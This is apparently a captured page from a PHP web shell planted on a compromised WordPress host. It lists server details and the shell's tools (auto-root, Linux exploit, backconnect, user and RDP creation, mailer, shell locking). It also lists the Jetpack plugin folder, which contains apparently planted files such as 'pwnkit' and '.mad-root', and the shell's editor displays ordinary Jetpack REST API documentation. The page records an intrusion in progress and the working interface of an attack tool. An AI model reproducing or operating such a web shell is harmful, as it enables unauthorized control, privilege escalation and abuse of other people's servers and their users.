Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
sync
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.svnignore
151
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
120.31
KB
-rw-r--r--
class.frame-nonce-preview.php
2.18
KB
-rw-r--r--
class.jetpack-admin.php
8.26
KB
-rw-r--r--
class.jetpack-autoupdate.php
6.79
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
2.94
KB
-rw-r--r--
class.jetpack-cli-call.php
25.22
KB
-rw-r--r--
class.jetpack-cli.php
20.53
KB
-rw-r--r--
class.jetpack-client-server.ph...
8.31
KB
-rw-r--r--
class.jetpack-client.php
10.3
KB
-rw-r--r--
class.jetpack-connection-banne...
24.73
KB
-rw-r--r--
class.jetpack-constants.php
2.35
KB
-rw-r--r--
class.jetpack-data.php
4.37
KB
-rw-r--r--
class.jetpack-debugger.php
19.68
KB
-rw-r--r--
class.jetpack-error.php
47
B
-rw-r--r--
class.jetpack-heartbeat.php
4.51
KB
-rw-r--r--
class.jetpack-idc.php
19.76
KB
-rw-r--r--
class.jetpack-ixr-client.php
3.2
KB
-rw-r--r--
class.jetpack-jitm.php
17.71
KB
-rw-r--r--
class.jetpack-modules-list-tab...
11.12
KB
-rw-r--r--
class.jetpack-network-first.ph...
546
B
-rw-r--r--
class.jetpack-network-sites-li...
4.26
KB
-rw-r--r--
class.jetpack-network.php
22.98
KB
-rw-r--r--
class.jetpack-options.php
10.72
KB
-rw-r--r--
class.jetpack-post-images.php
17.62
KB
-rw-r--r--
class.jetpack-signature.php
8.29
KB
-rw-r--r--
class.jetpack-tracks.php
2.87
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
8.84
KB
-rw-r--r--
class.jetpack-user-agent.php
45.94
KB
-rw-r--r--
class.jetpack-xmlrpc-server.ph...
16.02
KB
-rw-r--r--
class.jetpack.php
205.39
KB
-rw-r--r--
class.json-api-endpoints.php
60.81
KB
-rw-r--r--
class.json-api.php
19.27
KB
-rw-r--r--
class.photon.php
33.33
KB
-rw-r--r--
composer.json
345
B
-rw-r--r--
functions.compat.php
2.38
KB
-rw-r--r--
functions.gallery.php
2.26
KB
-rw-r--r--
functions.global.php
260
B
-rw-r--r--
functions.opengraph.php
15.48
KB
-rw-r--r--
functions.photon.php
8.49
KB
-rw-r--r--
jetpack.php
5.72
KB
-rw-r--r--
json-api-config.php
255
B
-rw-r--r--
json-endpoints.php
132.2
KB
-rw-r--r--
locales.php
59.55
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
15.87
KB
-rw-r--r--
require-lib.php
982
B
-rw-r--r--
rest-api.md
6.14
KB
-rw-r--r--
uninstall.php
830
B
-rw-r--r--
webpack.config.js
3.13
KB
-rw-r--r--
wpml-config.xml
213
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rest-api.md
# Jetpack HTTP API Jetpack's HTTP API is built as an [extension to the WP-API](http://v2.wp-api.org/extending/adding/). Thus, you may find additional information on approaching the API in the [WP API Docs](http://v2.wp-api.org/). ## API Authentication and authorization The API requests rely on [cookie-based authentication and a specific nonce](http://v2.wp-api.org/guide/authentication/#cookie-authentication) for requests to be authorized. ### API Request Authorization via nonces The WP REST API infrastructure requires a nonce for authorizing of the request itself. Ensure to use the `X-WP-Nonce` header on your request. ``` X-WP-Nonce: e1cff122e1 ``` The nonce is being served on the Jetpack admin page by usage of the [wp_localize_script](https://codex.wordpress.org/Function_Reference/wp_localize_script) mechanism for passing values from PHP code to the JS scope. It's created for the action `wp_rest` and made available in the Jetpack Admin Page as: ``` window.Initial_State.WP_API_nonce; ``` The root URL for the the API is found on the same page as: ``` window.Initial_State.WP_API_root; ``` ## Discovery WP-API-compatible [capabilities document](http://v2.wp-api.org/guide/discovery/) for the endpoints registered by Jetpack. `GET /wp-json/jetpack/v4` ## API Reference All endpoints return and accept JSON. Make sure you add the proper `content-type` header to your PUT/POST requests sending JSON objects. ``` 'Content-type': 'application/json' ``` ### Jetpack connection Operations related to Jetpack's connection to WordPress.com #### GET /wp-json/jetpack/v4/connection-status Fetch Jetpack's current connection status. #### GET /wp-json/jetpack/v4/connect-url Fetch a fresh WordPress.com URL for connecting the Jetpack installation. #### GET /wp-json/jetpack/v4/user-connection-data Fetch the data of the current's user WordPress.com account. #### POST /wp-json/jetpack/v4/disconnect/site Disconnect the Jetpack installation from WordPress.com servers. **This endpoint does not take Body parameters** #### POST /wp-json/jetpack/v4/recheck-ssl Check if the site has SSL enabled. **This endpoint does not take Body parameters** ### Jetpack modules #### GET /wp-json/jetpack/v4/module/all Get a list of all Jetpacks modules, its description, other properties and the module's options #### GET /wp-json/jetpack/v4/module/:module-slug Get a single module description and properties by its slug. **URL parameters** * `module-slug`: {String} The identifier of the module to get info about. #### POST /wp-json/jetpack/v4/module/:module-slug/active Activate or deactivate a module by its slug Accepts a JSON object in the body like: ``` { "active": true } ``` **URL parameters** * `module-slug`: {String} The identifier of the module on which to act. **Body parameters** * `active`: {Boolean} Send false to deactivate the module. #### POST /wp-json/jetpack/v4/module/activate Activate several modules at a time by their slug **Body parameters** * `modules`: {Array} An array of strings of identifiers of the modules to activate ``` { "modules": [ "protect", "monitor", "likes" ] } ``` #### POST /wp-json/jetpack/v4/module/:module-slug Update an option's value for a module **URL parameters** * `module-slug`: {String} The identifier of the module on which to act. **Body parameters** * Accepts a simple object with the key of the option to update and the new value. Accepts a JSON object in the body like: ``` { "option-key": "new-option-value" } ``` ### Jetpack miscellaneous settings ### GET /wp-json/jetpack/v4/settings Fetch a list of Jetpack settings not related to a particular module. ### POST /wp-json/jetpack/v4/settings/update Update a setting value **Body parameters** * Accepts a simple object with the key of the setting to update and the new value. Accepts a JSON object in the body like: ``` { "setting-key": "new-setting-value" } ``` #### POST /wp-json/jetpack/v4/jumpstart/activate Activate Jumpstart turning on some options and settings to a recommended state. **This endpoint does not take Body parameters** #### POST /wp-json/jetpack/v4/jumpstart/deactivate Deactivate Jumpstart reverting options to their default state. **This endpoint does not take Body parameters** #### POST /wp-json/jetpack/v4/reset/:options_or_modules Reset Jetpack module options or Jetpack modules activation state to default values. **URL parameters** * `options_or_modules`: {String} Available values: * `"options"`: all the modules' options will be re-set to their default values. * `"modules"`: the modules activation state will be reset to their defaults. **This endpoint does not take Body parameters** ### Users Operations related to the site's users linked to WordPress.com accounts. #### POST /wp-json/jetpack/v4/unlink Unlink current user from the related WordPress.com account. **This endpoint does not take Body parameters** ### Site information Operations related to information about the site. ### Jetpack notices #### POST /wp-json/jetpack/v4/notice/:notice/dismiss Dismiss a Jetpack notice by Id. **URL parameters** * `notice`: {String} The identifier of the notice to dismiss. Possible values: * `"feedback_dash_request"` * `"welcome"`. ** HTTP Status codes** * `404` - When `:notice` is not valid or absent #### GET /wp-json/jetpack/v4/site Get current site data ### Protect module related operations ##### GET /wp-json/jetpack/v4/module/protect/count/get Get count of blocked attacks by Protect. ### Monitor module related operations #### GET /wp-json/jetpack/v4/module/monitor/downtime/last Get from the Monitor module, the last time the site was down. ### Verification Tools module related operations #### GET /wp-json/jetpack/v4/module/verification-tools/services Get services that this site is verified with. ### Site's plugins related operations #### GET /wp-json/jetpack/v4/updates/plugins Get number of updated available for currently installed WordPress plugins. ### Akismet related operations #### GET /wp-json/jetpack/v4/akismet/stats/get Get stats from Akismet filtered spam. ### VaultPress options #### GET /wp-json/jetpack/v4/module/vaultpress/data get date of last backup or status and information about actions for user to take.
Close